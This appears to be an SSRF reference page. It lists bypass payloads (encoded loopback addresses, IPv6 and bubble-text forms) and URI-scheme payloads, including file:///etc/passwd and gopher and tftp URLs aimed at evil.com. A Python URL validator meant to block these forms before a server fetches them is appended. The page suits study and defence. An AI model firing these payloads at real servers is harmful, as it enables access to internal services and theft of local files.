SSRF
SSRF is usually found in requests that carry a URL for the server to fetch, for example:
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1
or
GET /image?url=http://192.168.1.1/ HTTP/1.1
Host: example.com
How to exploit
Basic payload
http://127.0.0.1:1337
http://localhost:1337
Hex encoding
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
Octal encoding
http://127.0.0.1 -> http://0177.0.0.01
Dword encoding
http://127.0.0.1 -> http://2130706433
Mixed encoding
http://127.0.0.1 -> http://0177.0.0.0x1
Using URL encoding
http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
Using IPv6
http://0000::1:1337/
http://[::]:1337/
Using bubble text
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
Bubble text can be generated with https://capitalizemytitle.com/bubble-text-generator/
How to exploit (URI Scheme)
File scheme
file:///etc/passwd
Dict scheme
dict://127.0.0.1:1337/
FTP scheme
ftp://127.0.0.1/
TFTP scheme
tftp://evil.com:1337/test
SFTP scheme
sftp://evil.com:1337/test
LDAP scheme
ldap://127.0.0.1:1337/
Gopher scheme
gopher://evil.com/_Test%0ASSRF
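
Added example (not part of the original page): a Python pre-fetch check a server could apply to parameters such as urlApi or url above. It folds the hex, octal, dword, mixed, URL-encoded and bubble-text forms listed here to one canonical host and allows only http/https. The function names and the scheme allow-list are assumptions of this example.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the feature only needs web fetches

def parse_inet_aton(host):
    """Parse hex/octal/dword/mixed IPv4 forms the way inet_aton() does, else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if not (p.isascii() and p.isalnum()):
            return None
        base = 16 if p.startswith("0x") else 8 if len(p) > 1 and p[0] == "0" else 10
        try:
            nums.append(int(p, base))
        except ValueError:
            return None
    *head, last = nums
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    for i, n in enumerate(head):  # the last part fills whatever bytes remain
        last += n << (8 * (3 - i))
    return ipaddress.IPv4Address(last)

def canonical_host(url):
    """Percent-decode, NFKC-fold and lowercase the host so look-alike forms compare equal."""
    host = unquote(urlsplit(url).hostname or "")
    return unicodedata.normalize("NFKC", host).lower().rstrip(".")

def check_url(url):
    """Return (allowed, detail) for a user-supplied URL before the server fetches it."""
    if urlsplit(url).scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = canonical_host(url)
    if not re.fullmatch(r"[a-z0-9.:-]+", host):
        return False, "invalid host"
    ip = parse_inet_aton(host)
    if ip is None and ":" in host:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            return False, "invalid host"
    if ip is not None:
        return ip.is_global, f"address {ip}"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "loopback name"
    # A plain name can still resolve to an internal address: resolve it and
    # run the same is_global check on the IP actually connected to.
    return True, f"hostname {host}"
```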